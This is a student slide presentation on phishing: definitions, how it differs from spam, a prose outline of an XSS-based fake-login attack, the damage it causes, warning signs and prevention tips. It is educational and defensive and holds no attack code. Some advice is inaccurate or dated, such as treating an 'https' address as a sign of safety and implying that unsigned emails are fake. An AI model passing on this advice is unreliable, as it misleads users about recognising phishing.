PHISHINGBY:- Sagar Rai P

I MSc Computer Science

PHISHING BASICS•The word has its origin from two words “Password Harwesting” or fishing for Passwords.•Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.•Also known as “brand spoofing”•Phishers are phishing artists.•Phishing techniques was described in detail in the year 1987 and this Technique was first used in the year 1995

Phishing Definition•Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.•It tries to trick users with official looking messages

• Credit card• Bank account• eBay• PayPal

•Some phishing emails also contain malicious or unwanted software that can track your activities or slow your computer.

Comparison To Spam•The purpose of a phishing message is to acquire sensitive information about a user. For doing so the message needs to deceive the intended recipient.

• So it doesn’t contains any useful information and hence falls under the category of spam.

•A spam message tries to sell a product or service, whereas phishing message needs to look like it is from a legitimate organization.•Techniques applied to spam message can’t be applied naively to phishing messages.

Existing System•Detect and block the phishing websites in time.•Enhance the security of the websites•Block the phishing emails by various spam filters.•Install online anti-phishing software in user’s computers.

Top 10 Phishing Sites Hosting Countries

How Phishing Attack•Hacker embeds fake login form to XSS vulnerable page. It might be online shop, internet banking, payment system, etc•Hacker sends Email with the link to this transformed page(actually link contains HTML injection code as a parameter). This email looks pretty similar to emails typically sent from this website to registered users(only without user name in greeting)•User clicks the link and opens fake web-page. If user enters his username and password to login , all of their account details will be sent to hackers web-server.•User may not notice anything strange because real “home” or “Welcome” pages are what he was expecting to see.

How Phishing Attack

Damages Caused By Phishing

•The damage caused by phishing ranges from loss of access to email to substantial financial loss. This style of identity theft is becoming more popular, because of the ease with which unsuspecting people often divulge personal information to phishers, including credit card numbers, social security numbers, and mothers maiden names. There are also fears that identity thieves can obtain some such information simply by accessing public records. Once they have the information they need and want, the phishers will use that person’s details to create fake accounts using the victims name, using up a persons credit. Or even prevent the victim from accessing to their own accounts.

How To Detect Phishing Website?

How Does a Phishing Email Message look like?!!

•Spelling and bad grammar. Cybercriminals are not known for their grammar and spelling.•Beware of links in email. If you see a link in a suspicious email message, don’t click on it.•Threats. Have ever received a threat that your Hotmail account would be closed if you didn’t respond to an email message? The email message shown in the next slide is an example of the same trick.•Spoofing popular websites or companies, scam artist use graphics in an email that appear to be connected to legitimate websites but actually take you to phony scam sites or legitimate-looking pop-up windows.

How does a Phishing Email message look like

Example for Phishing Website

Functions.

Prevention to be taken to avoid Phishing•Prevention: What to do•Protect your computer with anti-virus software, spyware filters, e-mail filters, and firewall programs, and make sure that they are regularly updated.•Ensure that your Internet browser is up to date and security patches applied.•Avoid responding any unknown email or giving your financial information to that email.•Unless the email is digitally signed, it should also be fake.•Phishers typically ask for information such as usernames, passwords, credit card numbers, social security numbers, etc.

Prevention to be taken to avoid Phishing•Phishers typically are typically not personalized, while valid message from your bank or e-commerce company are generally personalized.•Always ensure that you’re using a secure website when submitting credit card or other sensitive information via your Web Browser.•To make sure you’re on a secure Web server, check the beginning of the Web address bar –it should be “https:// “rather just ” http://”. •Regularly log into your online accounts. Don’t leave them for a long period of time.•Regularly check your bank, credit and debit card statements to ensure that all transaction are legitimate.•If anything is suspicious, contact your bank and all card issuers.

Prevention: What not to do•Don’t assume that you can correctly identify a website as legitimate by just looking at it.•Don’t use the links in an email to get to any web page, if you think that the message might not be authentic.•Log onto the website directly by typing in the web address in your browser.•Avoid filling out forms in email messages that ask for personal financial information.•You should only communicate information such as credit card numbers or account information via a secure website or the telephone.

Conclusion•Phishing is identity theft. It is fraud. It masquerades as legitimate and trustworthy entities in order to obtain sensitive data. It then uses it to “rip off” the misled user with often tragic consequences. •Phishing is a form of criminal conduct that poses increasing threats to consumers, financial institution and commercial enterprises in Canada, united States, and other countries. Because phishing shows no sign of abating, and indeed is likely to continue in newer and more sophisticated forms, law enforcement, other countries will need to cooperate more closely than ever in their efforts to combat phishing, through improved public education, prevention, authentication, and binational and national enforcement efforts.

Source Of Information•www.wikipedia.org•www.antiphishing.org•www.google.com•www.webopedia.com•www.computerworld.com•www.honeynet.org